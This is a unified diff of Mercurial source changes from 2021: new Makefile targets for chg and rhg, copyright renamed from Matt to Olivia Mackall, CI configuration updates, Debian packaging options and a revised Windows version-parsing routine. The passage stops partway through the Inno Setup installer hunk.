--- a/Makefile Thu Mar 25 19:06:28 2021 -0400
+++ b/Makefile Tue Apr 20 11:01:06 2021 -0400
@@ -68,6 +68,12 @@
build:
$(PYTHON) setup.py $(PURE) build $(COMPILERFLAG)
+build-chg:
+ make -C contrib/chg
+
+build-rhg:
+ (cd rust/rhg; cargo build --release)
+
wheel:
FORCE_SETUPTOOLS=1 $(PYTHON) setup.py $(PURE) bdist_wheel $(COMPILERFLAG)
@@ -96,6 +102,9 @@
install-bin: build
$(PYTHON) setup.py $(PURE) install --root="$(DESTDIR)/" --prefix="$(PREFIX)" --force
+install-chg: build-chg
+ make -C contrib/chg install PREFIX="$(PREFIX)"
+
install-doc: doc
cd doc && $(MAKE) $(MFLAGS) install
@@ -107,6 +116,9 @@
install-home-doc: doc
cd doc && $(MAKE) $(MFLAGS) PREFIX="$(HOME)" install
+install-rhg: build-rhg
+ install -m 755 rust/target/release/rhg "$(PREFIX)"/bin/
+
MANIFEST-doc:
$(MAKE) -C doc MANIFEST
@@ -175,7 +187,7 @@
$(PYFILESCMD) | xargs \
xgettext --package-name "Mercurial" \
--msgid-bugs-address "<mercurial-devel@mercurial-scm.org>" \
- --copyright-holder "Matt Mackall <mpm@selenic.com> and others" \
+ --copyright-holder "Olivia Mackall <olivia@selenic.com> and others" \
--from-code ISO-8859-1 --join --sort-by-file --add-comments=i18n: \
-d hg -p i18n -o hg.pot.tmp
$(PYTHON) i18n/posplit i18n/hg.pot.tmp
--- a/README.rst Thu Mar 25 19:06:28 2021 -0400
+++ b/README.rst Tue Apr 20 11:01:06 2021 -0400
@@ -18,3 +18,13 @@
See https://mercurial-scm.org/ for detailed installation
instructions, platform-specific notes, and Mercurial user information.
+
+Notes for packagers
+===================
+
+Mercurial ships a copy of the python-zstandard sources, used to provide
+zstd compression and decompression support. The bundled module is not
+intended to be replaced by a plain python-zstandard installation, nor is
+it intended to link against a system zstd library. Patches to that effect
+can result in hard-to-diagnose errors and are explicitly discouraged as an
+unsupported configuration.
--- a/black.toml Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,14 +0,0 @@
-[tool.black]
-line-length = 80
-exclude = '''
-build/
-| wheelhouse/
-| dist/
-| packages/
-| \.hg/
-| \.mypy_cache/
-| \.venv/
-| mercurial/thirdparty/
-'''
-skip-string-normalization = true
-quiet = true
--- a/contrib/all-revsets.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/all-revsets.txt Tue Apr 20 11:01:06 2021 -0400
@@ -46,8 +46,8 @@
# Used in revision c1546d7400ef
min(0::)
# Used in revision 546fa6576815
-author(lmoscovicz) or author(mpm)
-author(mpm) or author(lmoscovicz)
+author(lmoscovicz) or author(olivia)
+author(olivia) or author(lmoscovicz)
# Used in revision 9bfe68357c01
public() and id("d82e2223f132")
# Used in revision ba89f7b542c9
@@ -100,7 +100,7 @@
draft() and ::tip
::tip and draft()
author(lmoscovicz)
-author(mpm)
+author(olivia)
::p1(p1(tip))::
public()
:10000 and public()
@@ -130,7 +130,7 @@
head()
head() - public()
draft() and head()
-head() and author("mpm")
+head() and author("olivia")
# testing the mutable phases set
draft()
--- a/contrib/base-revsets.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/base-revsets.txt Tue Apr 20 11:01:06 2021 -0400
@@ -25,9 +25,9 @@
0::tip
roots(0::tip)
author(lmoscovicz)
-author(mpm)
-author(lmoscovicz) or author(mpm)
-author(mpm) or author(lmoscovicz)
+author(olivia)
+author(lmoscovicz) or author(olivia)
+author(olivia) or author(lmoscovicz)
tip:0
0::
# those two `roots(...)` inputs are close to what phase movement use.
--- a/contrib/check-code.py Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/check-code.py Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# check-code - a style and portability checker for Mercurial
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/contrib/check-commit Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/check-commit Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
#!/usr/bin/env python3
#
-# Copyright 2014 Matt Mackall <mpm@selenic.com>
+# Copyright 2014 Olivia Mackall <olivia@selenic.com>
#
# A tool/hook to run basic sanity checks on commits/patches for
# submission to Mercurial. Install by adding the following to your
--- a/contrib/check-config.py Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/check-config.py Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# check-config - a config flag documentation checker for Mercurial
#
-# Copyright 2015 Matt Mackall <mpm@selenic.com>
+# Copyright 2015 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/contrib/chg/chg.1 Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/chg/chg.1 Tue Apr 20 11:01:06 2021 -0400
@@ -36,6 +36,6 @@
.B \-\-kill\-chg\-daemon
Terminate the background command servers.
.SH SEE ALSO
-.BR hg (1),
+.BR hg (1)
.SH AUTHOR
Written by Yuya Nishihara <yuya@tcha.org>.
--- a/contrib/clang-format-ignorelist Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/clang-format-ignorelist Tue Apr 20 11:01:06 2021 -0400
@@ -9,3 +9,4 @@
hgext/fsmonitor/pywatchman/**.c
mercurial/thirdparty/**.c
mercurial/thirdparty/**.h
+mercurial/pythoncapi_compat.h
--- a/contrib/examples/fix.hgrc Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/examples/fix.hgrc Tue Apr 20 11:01:06 2021 -0400
@@ -5,7 +5,7 @@
rustfmt:command = rustfmt +nightly
rustfmt:pattern = set:"**.rs" - "mercurial/thirdparty/**"
-black:command = black --config=black.toml -
+black:command = black --config=pyproject.toml -
black:pattern = set:**.py - mercurial/thirdparty/**
# Mercurial doesn't have any Go code, but if we did this is how we
--- a/contrib/fuzz/Makefile Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/fuzz/Makefile Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,5 @@
-CC = clang
-CXX = clang++
+CC ?= clang
+CXX ?= clang++
# By default, use our own standalone_fuzz_target_runner.
# This runner does no fuzzing, but simply executes the inputs
@@ -10,6 +10,15 @@
# OSS-Fuzz will define its own value for LIB_FUZZING_ENGINE.
LIB_FUZZING_ENGINE ?= standalone_fuzz_target_runner.o
+# Default to Python 3.
+#
+# Windows ships Python 3 as `python.exe`, which may not be on PATH. py.exe is.
+ifeq ($(OS),Windows_NT)
+PYTHON?=py -3
+else
+PYTHON?=python3
+endif
+
PYTHON_CONFIG ?= $$OUT/sanpy/bin/python-config
PYTHON_CONFIG_FLAGS ?= --ldflags --embed
@@ -20,7 +29,7 @@
standalone_fuzz_target_runner.o: standalone_fuzz_target_runner.cc
$$OUT/%_fuzzer_seed_corpus.zip: %_corpus.py
- python $< $@
+ $(PYTHON) $< $@
pyutil.o: pyutil.cc pyutil.h
$(CXX) $(CXXFLAGS) -g -O1 \
--- a/contrib/heptapod-ci.yml Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/heptapod-ci.yml Tue Apr 20 11:01:06 2021 -0400
@@ -7,6 +7,8 @@
variables:
PYTHON: python
TEST_HGMODULEPOLICY: "allow"
+ HG_CI_IMAGE_TAG: "latest"
+ TEST_HGTESTS_ALLOW_NETIO: "0"
.runtests_template: &runtests
stage: tests
@@ -17,21 +19,12 @@
- hg -R /tmp/mercurial-ci/ update `hg log --rev '.' --template '{node}'`
- cd /tmp/mercurial-ci/
- ls -1 tests/test-check-*.* > /tmp/check-tests.txt
+ - black --version
+ - clang-format --version
script:
- echo "python used, $PYTHON"
- echo "$RUNTEST_ARGS"
- - HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS
-
-
-.rust_template: &rust
- before_script:
- - hg clone . /tmp/mercurial-ci/ --noupdate --config phases.publish=no
- - hg -R /tmp/mercurial-ci/ update `hg log --rev '.' --template '{node}'`
- - ls -1 tests/test-check-*.* > /tmp/check-tests.txt
- - cd /tmp/mercurial-ci/rust/rhg
- - cargo build
- - cd /tmp/mercurial-ci/
-
+ - HGTESTS_ALLOW_NETIO="$TEST_HGTESTS_ALLOW_NETIO" HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS
checks-py2:
<<: *runtests
@@ -58,14 +51,23 @@
phabricator-refresh:
stage: phabricator
+ variables:
+ DEFAULT_COMMENT: ":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)"
+ STABLE_COMMENT: ":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)\n⚠ This patch is intended for stable ⚠\n{image https://media.giphy.com/media/nYI8SmmChYXK0/source.gif}"
script:
- - "./contrib/phab-refresh-stack.sh --comment \":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)\""
+ - |
+ if [ `hg branch` == "stable" ]; then
+ ./contrib/phab-refresh-stack.sh --comment "$STABLE_COMMENT";
+ else
+ ./contrib/phab-refresh-stack.sh --comment "$DEFAULT_COMMENT";
+ fi
test-py2:
<<: *runtests
variables:
RUNTEST_ARGS: " --no-rust --blacklist /tmp/check-tests.txt"
TEST_HGMODULEPOLICY: "c"
+ TEST_HGTESTS_ALLOW_NETIO: "1"
test-py3:
<<: *runtests
@@ -73,6 +75,7 @@
RUNTEST_ARGS: " --no-rust --blacklist /tmp/check-tests.txt"
PYTHON: python3
TEST_HGMODULEPOLICY: "c"
+ TEST_HGTESTS_ALLOW_NETIO: "1"
test-py2-pure:
<<: *runtests
@@ -89,7 +92,6 @@
test-py2-rust:
<<: *runtests
- <<: *rust
variables:
HGWITHRUSTEXT: cpython
RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt"
@@ -97,13 +99,20 @@
test-py3-rust:
<<: *runtests
- <<: *rust
variables:
HGWITHRUSTEXT: cpython
RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt"
PYTHON: python3
TEST_HGMODULEPOLICY: "rust+c"
+test-py3-rhg:
+ <<: *runtests
+ variables:
+ HGWITHRUSTEXT: cpython
+ RUNTEST_ARGS: "--rust --rhg --blacklist /tmp/check-tests.txt"
+ PYTHON: python3
+ TEST_HGMODULEPOLICY: "rust+c"
+
test-py2-chg:
<<: *runtests
variables:
--- a/contrib/hg-test-mode.el Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/hg-test-mode.el Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
;; hg-test-mode.el - Major mode for editing Mercurial tests
;;
-;; Copyright 2014 Matt Mackall <mpm@selenic.com>
+;; Copyright 2014 Olivia Mackall <olivia@selenic.com>
;; "I have no idea what I'm doing"
;;
;; This software may be used and distributed according to the terms of the
--- a/contrib/hgperf Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/hgperf Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# hgperf - measure performance of Mercurial commands
#
-# Copyright 2014 Matt Mackall <mpm@selenic.com>
+# Copyright 2014 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/contrib/logo-droplets.svg Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/logo-droplets.svg Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,5 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!-- Created with Inkscape (http://www.inkscape.org/) -->
-<svg id="Layer_1" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://www.w3.org/2000/svg" xml:space="preserve" height="120" width="100" version="1.0" xmlns:cc="http://web.resource.org/cc/" xmlns:dc="http://purl.org/dc/elements/1.1/" viewBox="0 0 124.766 152.099"><metadata id="metadata6845"><rdf:RDF><cc:Work rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type rdf:resource="http://purl.org/dc/dcmitype/StillImage"/><dc:title>Mercurial "droplets" logo</dc:title><dc:creator><cc:Agent><dc:title>Cali Mastny and Matt Mackall</dc:title></cc:Agent></dc:creator><cc:license rdf:resource="http://creativecommons.org/licenses/GPL/2.0/"/><dc:date>Feb 12 2008</dc:date></cc:Work><cc:License rdf:about="http://creativecommons.org/licenses/GPL/2.0/"><cc:permits rdf:resource="http://web.resource.org/cc/Reproduction"/><cc:permits rdf:resource="http://web.resource.org/cc/Distribution"/><cc:requires rdf:resource="http://web.resource.org/cc/Notice"/><cc:permits rdf:resource="http://web.resource.org/cc/DerivativeWorks"/><cc:requires rdf:resource="http://web.resource.org/cc/ShareAlike"/><cc:requires rdf:resource="http://web.resource.org/cc/SourceCode"/></cc:License></rdf:RDF></metadata>
+<svg id="Layer_1" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://www.w3.org/2000/svg" xml:space="preserve" height="120" width="100" version="1.0" xmlns:cc="http://web.resource.org/cc/" xmlns:dc="http://purl.org/dc/elements/1.1/" viewBox="0 0 124.766 152.099"><metadata id="metadata6845"><rdf:RDF><cc:Work rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type rdf:resource="http://purl.org/dc/dcmitype/StillImage"/><dc:title>Mercurial "droplets" logo</dc:title><dc:creator><cc:Agent><dc:title>Cali Mastny and Olivia Mackall</dc:title></cc:Agent></dc:creator><cc:license rdf:resource="http://creativecommons.org/licenses/GPL/2.0/"/><dc:date>Feb 12 2008</dc:date></cc:Work><cc:License rdf:about="http://creativecommons.org/licenses/GPL/2.0/"><cc:permits rdf:resource="http://web.resource.org/cc/Reproduction"/><cc:permits rdf:resource="http://web.resource.org/cc/Distribution"/><cc:requires rdf:resource="http://web.resource.org/cc/Notice"/><cc:permits rdf:resource="http://web.resource.org/cc/DerivativeWorks"/><cc:requires rdf:resource="http://web.resource.org/cc/ShareAlike"/><cc:requires rdf:resource="http://web.resource.org/cc/SourceCode"/></cc:License></rdf:RDF></metadata>
<rect id="rect6847" stroke-linejoin="miter" style="stroke-dasharray:none;" height="150.12" width="124.77" stroke="#000" stroke-miterlimit="4" y="0.98776" x="0.3169" stroke-width="1.9755" fill="#FFF"/><path id="text2611" style="stroke-dasharray:none;" d="M9.848,124.61c1.777-0.79,3.665-1.18,5.479-1.18,1.74,0,2.851,0.43,3.48,1.32,1.332-0.89,3.146-1.32,4.553-1.32,4.221,0,4.369,1.71,4.369,6.73v11.11c0,0.49,0.074,0.49-2.036,0.49v-11.81c0-3.63-0.074-4.74-2.48-4.74-1.073,0-2.184,0.25-3.369,1.03v15.27c-0.037,0.15-0.111,0.18-0.369,0.22-0.038,0-0.074,0.03-0.112,0.03h-1.555v-11.81c0-3.49,0-4.77-2.517-4.77-1.074,0-2.147,0.21-3.406,0.82v15.27c0,0.49,0.074,0.49-2.0361,0.49v-17.15m27.831-1.18c-3.146,0-6.626,0.89-6.626,10.4,0,7.33,2.554,8.47,6.071,8.47,2.701,0,5.034-0.89,5.034-1.32,0-0.53-0.074-1.35-0.259-1.82-1.148,0.79-2.777,1.21-4.59,1.21-2.48,0-4.146-0.71-4.184-6.22,1.629,0,5.776-0.04,8.848-0.65,0.259-1.17,0.37-2.88,0.37-4.37,0-3.56-1.444-5.7-4.664-5.7m-0.185,1.78c2.221,0,2.813,1.46,2.85,4.31,0,0.75-0.037,1.64-0.148,2.49-2.073,0.5-5.591,0.5-7.072,0.5,0.261-6.48,2.481-7.3,4.37-7.3m8.07-0.21c1.739-1.14,3.332-1.57,4.961-1.57,1.814,0,2.666,0.5,2.666,1.11,0,0.35-0.112,0.96-0.297,1.31-0.519-0.28-1.11-0.53-2.074-0.53-1.184,0-2.295,0.32-3.183,1.1v14.85c0,0.49,0.037,0.49-2.073,0.49v-16.76m18.69-0.39c0-0.47-1.554-1.18-3.11-1.18-2.999,0-6.664,1.03-6.664,9.83,0,8.33,2.222,9.07,6.109,9.07,1.924,0,3.665-1.03,3.665-1.6,0-0.32-0.074-0.82-0.26-1.24-0.778,0.56-1.962,1.1-3.22,1.1-2.665,0-4.22-0.75-4.22-7.23,0-7.15,2.554-8.15,4.775-8.15,1.258,0,1.962,0.36,2.665,0.82,0.186-0.43,0.26-1.03,0.26-1.42m14.181,16.55c-1.63,0.82-3.776,1.14-5.627,1.14-4.739,0-5.442-1.99-5.442-6.73v-11.14c0-0.46-0.037-0.46,2.074-0.46v11.82c0,3.56,0.517,4.77,3.294,4.77,1.073,0,2.554-0.22,3.665-0.86v-15.27c0-0.46-0.074-0.46,2.036-0.46v17.19m4.221-16.16c1.739-1.14,3.332-1.57,4.96-1.57,1.814,0,2.666,0.5,2.666,1.11,0,0.35-0.111,0.96-0.296,1.31-0.519-0.28-1.111-0.53-2.074-0.53-1.184,0-2.295,0.32-3.183,1.1v14.85c0,0.49,0.037,0.49-2.073,0.49v-16.76m12.379-1.03c-1.629,0-2.11,0-2.11,0.96v16.83c2.073,0,2.11,0,2.11-0.49v-17.3m-2.184-6.27c0,1.18,0.37,1.6,1.11,1.64,0.851,0,1.259-0.61,1.259-1.67,0.037-1.11-0.26-1.61-1.111-1.61-0.814,0-1.221,0.61-1.258,1.64m5.696,7.3c0-0.39,0.074-0.61,0.222-0.71,0.704-0.39,3.41-0.86,6.48-0.86,2.33,0,3.81,1.11,3.81,4.31v2.31c0,6.34-0.18,11.07-0.18,11.07-0.85,0.47-2.45,1.18-5.04,1.18-2.66,0.03-5.329-0.22-5.329-5.48,0-5.02,2.739-5.81,5.479-5.81,1.04,0,2.26,0.11,3.07,0.43v-3.31c0-2.31-1.18-2.81-2.59-2.81-1.89,0-4.514,0.35-5.662,0.89-0.222-0.39-0.26-1-0.26-1.21m8.512,7.9c-0.7-0.25-1.7-0.35-2.4-0.35-2.11,0-4.04,0.42-4.04,4.34,0,3.66,1.59,3.7,3.48,3.7,1.19,0,2.37-0.32,2.78-0.75,0,0,0.18-4.27,0.18-6.94m7.86,8.37c0,0.49,0.04,0.49-2.04,0.49v-25.2c0-0.96,0.41-0.96,2.04-0.96v25.67" stroke-miterlimit="4" stroke-width="2.02999997" fill="#010101"/><g id="g4503" transform="matrix(0.9351326,0,0,0.9351326,150.39508,-1.251766)"><path id="path2339" fill="#1b1a1b" d="M-45.75,92.692c20.04-33.321-4.232-87.363-48.614-81.873-40.096,4.958-40.746,47.165-5.405,57.191,30.583,8.685,6.318,28.084,7.027,41,0.712,12.92,26.587,17.6,46.992-16.318z"/><circle id="circle2341" transform="matrix(1.0917947,-0.2858168,0.2858168,1.0917947,-180.30817,13.494135)" cy="85.364" cx="33.728" r="15.414" fill="#1b1a1b"/><path id="path2343" fill="#1b1a1b" d="M-140.06,48.936c-6.26,0.606-10.84,6.164-10.24,12.422,0.61,6.262,6.17,10.847,12.43,10.241,6.26-0.614,10.84-6.171,10.23-12.43-0.61-6.253-6.16-10.839-12.42-10.233z"/><path id="path2561" fill="#bfbfbf" 
d="M-44.993,91.34c20.041-33.321-4.231-87.363-48.613-81.873-40.104,4.9568-40.744,47.166-5.406,57.193,30.583,8.684,6.318,28.083,7.027,41,0.713,12.92,26.587,17.6,46.992-16.32z"/><path id="path2563" fill="#000" d="M-86.842,112.76c-1.215-1.97,0.642-4.16,2.551-3.99,3.039,0.26,9.655-0.04,14.876-3,13.043-7.39,33.114-42.966,23.019-65.405-4.519-10.044-6.72-12.92-11.374-17.833-0.95-1.002-0.405-0.948,0.238-0.609,2.517,1.321,6.94,6.437,11.477,14.765,7.664,14.069,7.267,30.795,4.416,41.287-1.986,7.299-8.825,23.815-18.842,30.955-10.039,7.15-21.785,11.26-26.361,3.83z"/><path id="path2565" fill="#000" d="M-95.93,66.591c-6.83-2.028-15.64-4.853-20.74-11.517-3.75-4.914-5.66-10.277-6.15-13.318-0.17-1.085-0.32-1.991-0.01-2.24,0.15-0.117,2.81,5.896,6.79,10.936,3.97,5.04,9.53,7.988,14.16,9.059,4.117,0.952,12.646,3.044,15.532,5.503,2.967,2.527,3.215,7.987,2.216,8.603-1.006,0.62-3.048-4.429-11.798-7.026z"/><path id="path2567" fill="#FFF" d="M-81.841,113.72c-0.132,1.57,1.665,1.87,4.083,1.51,3.099-0.46,5.72-0.81,9.287-2.6,4.835-2.42,9.728-5.89,13.312-10.57,10.692-13.945,14.478-30.45,13.895-32.824-0.195,1.961-2.776,12.253-8.679,21.532-7.582,11.922-13.079,18.262-25.758,21.342-3.529,0.86-5.967-0.45-6.14,1.61z"/><path id="path2569" fill="#FFF" d="M-109.96,59.479c1.44,1.225,4.4,2.857,10.223,4.767,7.031,2.305,10.455,4.304,11.888,5.262,1.52,1.018,2.483,3.288,2.578,1.272,0.099-2.019-1.145-3.755-3.921-4.675-1.878-0.624-5.038-2.109-8.067-2.707-1.946-0.384-5.111-1.146-7.831-1.978-1.48-0.457-3-1.258-4.87-1.941z"/><circle id="circle2577" transform="matrix(1.0917947,-0.2858168,0.2858168,1.0917947,-180.30817,13.494135)" cy="84.375" cx="34.681" r="15.414" fill="#bfbfbf"/><path id="path2579" fill="#000" d="M-128.68,108.38c13.53,12.54,33.894-4.69,24.93-19.897-1.01-1.708-2.32-3.009-1.89-1.7,2.87,8.747,0.22,15.667-4.72,19.227-4.85,3.5-11.51,4.09-16.84,1.32-1.57-0.81-2.22,0.37-1.48,1.05z"/><path id="path2585" fill="#FFF" d="M-118.07,110.95c1.73-0.36,11.75-2.95,14.1-11.194,0.73-2.569,0.86-2.053,0.66-0.661-1.06,7.105-7.78,12.345-13.49,12.545-1.16,0.12-2.68-0.39-1.27-0.69z"/><path id="path2589" fill="#bfbfbf" d="M-139.3,47.584c-6.26,0.605-10.84,6.164-10.24,12.422,0.61,6.261,6.17,10.847,12.43,10.241,6.25-0.614,10.84-6.173,10.23-12.431-0.61-6.254-6.17-10.838-12.42-10.232z"/><path id="path2591" fill="#000" d="M-144.47,67.571c0.07,0.805,1.17,1.838,2.9,2.312,1.49,0.408,5.32,1.45,10.25-1.658,4.92-3.108,5.49-11.421,3.25-13.865-0.69-1.239-1.59-2.14-0.88-0.164,1.81,4.99-1.7,9.659-4.74,11.82-3.03,2.162-6.88,1.139-8.45,0.66s-2.4,0.064-2.33,0.895z"/><path id="path2597" fill="#FFF" d="M-138.11,68.688c0.45-0.406,2.73-0.24,4.79-1.35,2.07-1.109,4.52-3.54,4.95-6.994,0.26-2.029,0.34-1.519,0.44-0.415-0.32,5.743-5.6,8.916-8.62,9.334-0.82,0.113-2.25,0.044-1.56-0.575z"/><path id="path2561_1_" fill="#999" d="M-47.767,69.694c8.532-24.594-9.323-61.736-45.446-57.268-32.637,4.035-33.167,38.389-4.4,46.55,32.582,4.933,12.962,29.512,10.179,41.904-2.495,11.11,26.331,12.94,39.667-31.186z"/><path id="path2571" fill="#f3f3f3" d="M-70.093,88.904c-8.827-1.092-21.529,18.836-9.552,16.506,5.756-0.86,10.525-2.89,14.794-7.762,5.567-6.353,13.883-20.074,16.288-28.94,2.025-7.476,1.007-19.057-1.081-8.175-2.142,11.167-11.623,29.464-20.449,28.371z"/><path id="path2581" fill="#999" d="M-129.39,104.85c2.05,0.03,3.28,0.32,5.35,1.77,4.09,1.7,11.61,0.62,15.09-3.95,3.47-4.57,3.58-10.868,2.26-14.674-3.24-9.314-16.99-9.149-23.13-1.417-6.64,8.636-1.61,18.231,0.43,18.271z"/><path id="path2593_2_" fill="#999" 
d="M-147.64,61.684c0.41,1.282,1.45,3.154,3.65,3.466,2.94,0.417,3.54,1.743,7,1.055,3.47-0.688,6.09-3.528,7.14-6.67,1.21-4.347-0.59-6.591-3.31-8.595-2.71-2.003-8.67-1.788-12.23,1.458-2.53,2.305-3.24,6.163-2.25,9.286z"/><path id="path256" fill="#f3f3f3" d="M-136.11,64.558c2.66-0.697,6.18-4.325,4.44-7.096-2.16-3.413-8.17-0.491-8.37,3.309-0.21,3.802,1.11,4.526,3.93,3.787z"/><path id="path258" fill="#f3f3f3" d="M-116.12,105.51c2.28-0.6,9.24-3.43,7.93-13.547-0.66-5.126-3.46,6.361-8.63,8.077-7.85,2.61-6.97,7.48,0.7,5.47z"/></g>
</svg>
--- a/contrib/memory.py Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/memory.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# memory.py - track memory usage
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/contrib/packaging/debian/control Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/packaging/debian/control Tue Apr 20 11:01:06 2021 -0400
@@ -25,7 +25,9 @@
Suggests: wish
Replaces: mercurial-common
Breaks: mercurial-common
+Provides: python3-mercurial
Architecture: any
+Homepage: https://www.mercurial-scm.org/
Description: fast, easy to use, distributed revision control tool.
Mercurial is a fast, lightweight Source Control Management system designed
for efficient handling of very large distributed projects.
--- a/contrib/packaging/debian/copyright Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/packaging/debian/copyright Tue Apr 20 11:01:06 2021 -0400
@@ -3,7 +3,7 @@
Source: https://www.mercurial-scm.org/
Files: *
-Copyright: 2005-2021, Matt Mackall <mpm@selenic.com> and others.
+Copyright: 2005-2021, Olivia Mackall <olivia@selenic.com> and others.
License: GPL-2+
This program is free software; you can redistribute it
and/or modify it under the terms of the GNU General Public
--- a/contrib/packaging/debian/rules Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/packaging/debian/rules Tue Apr 20 11:01:06 2021 -0400
@@ -18,6 +18,10 @@
# DEB_HG_PYTHON_VERSIONS="3.7 3.8" make deb
DEB_HG_MULTI_VERSION?=0
+# Set to 1 to make /usr/bin/hg a symlink to chg, and move hg to
+# /usr/lib/mercurial/hg.
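+# For example (mirroring the DEB_HG_PYTHON_VERSIONS example above; the exact
+# invocation is illustrative):
+#   DEB_HG_CHG_BY_DEFAULT=1 make deb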
+DEB_HG_CHG_BY_DEFAULT?=0
+
CPUS=$(shell cat /proc/cpuinfo | grep -E ^processor | wc -l)
# By default, only build for the version of python3 that the system considers
@@ -40,6 +44,12 @@
DEB_HG_PYTHON_VERSIONS?=$(shell py3versions -vd)
endif
+ifeq ($(DEB_HG_CHG_BY_DEFAULT), 1)
+	# Important: the "real" hg must have a 'basename' of 'hg'. Otherwise, hg
+	# behaves differently when setting $HG, and breaks aliases that rely on it.
+ export HGPATH=/usr/lib/mercurial/hg
+endif
+
export HGPYTHON3=1
export PYTHON=python3
@@ -86,3 +96,8 @@
cp contrib/bash_completion "$(CURDIR)"/debian/mercurial/usr/share/bash-completion/completions/hg
mkdir -p "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions
cp contrib/zsh_completion "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions/_hg
+ if [ "$(DEB_HG_CHG_BY_DEFAULT)" -eq 1 ]; then \
+ mkdir -p "$(CURDIR)"/debian/mercurial/usr/lib/mercurial; \
+ mv "$(CURDIR)"/debian/mercurial/usr/bin/hg "$(CURDIR)"/debian/mercurial/usr/lib/mercurial/hg; \
+ ln -s chg "$(CURDIR)"/debian/mercurial/usr/bin/hg; \
+ fi
--- a/contrib/packaging/hgpackaging/util.py Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/packaging/hgpackaging/util.py Tue Apr 20 11:01:06 2021 -0400
@@ -161,10 +161,10 @@
>>> normalize_windows_version("5.3rc1")
'5.3.0.1'
- >>> normalize_windows_version("5.3rc1+2-abcdef")
+ >>> normalize_windows_version("5.3rc1+hg2.abcdef")
'5.3.0.1'
- >>> normalize_windows_version("5.3+2-abcdef")
+ >>> normalize_windows_version("5.3+hg2.abcdef")
'5.3.0.2'
"""
if '+' in version:
@@ -188,8 +188,8 @@
if rc is not None:
versions.append(rc)
elif extra:
- # <commit count>-<hash>+<date>
- versions.append(int(extra.split('-')[0]))
+ # hg<commit count>.<hash>+<date>
+ versions.append(int(extra.split('.')[0][2:]))
return '.'.join('%d' % x for x in versions[0:4])
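For reference, a minimal standalone sketch of the new extra-suffix parsing (the
helper name is illustrative; the real function also derives the leading
X.Y(.Z)/rc fields exercised by the doctests above)::

    def commit_count_from_extra(extra):
        # New format: "hg<commit count>.<hash>" (any "+<date>" part was
        # already split off by the caller on '+').
        return int(extra.split('.')[0][2:])  # drop the leading 'hg'

    assert commit_count_from_extra('hg2.abcdef') == 2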
--- a/contrib/packaging/inno/mercurial.iss Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/packaging/inno/mercurial.iss Tue Apr 20 11:01:06 2021 -0400
@@ -6,7 +6,7 @@
#endif
[Setup]
-AppCopyright=Copyright 2005-2021 Matt Mackall and others
+AppCopyright=Copyright 2005-2021 Olivia Mackall and others
AppName=Mercurial
AppVersion={#VERSION}
OutputBaseFilename=Mercurial-{#VERSION}{#SUFFIX}
@@ -20,7 +20,7 @@
InfoAfterFile=../postinstall.txt
LicenseFile=Copying.txt
ShowLanguageDialog=yes
-AppPublisher=Matt Mackall and others
+AppPublisher=Olivia Mackall and others
AppPublisherURL=https://mercurial-scm.org/
AppSupportURL=https://mercurial-scm.org/
AppUpdatesURL=https://mercurial-scm.org/
@@ -29,8 +29,8 @@
DefaultDirName={pf}\Mercurial
SourceDir=stage
VersionInfoDescription=Mercurial distributed SCM (version {#VERSION})
-VersionInfoCopyright=Copyright 2005-2021 Matt Mackall and others
-VersionInfoCompany=Matt Mackall and others
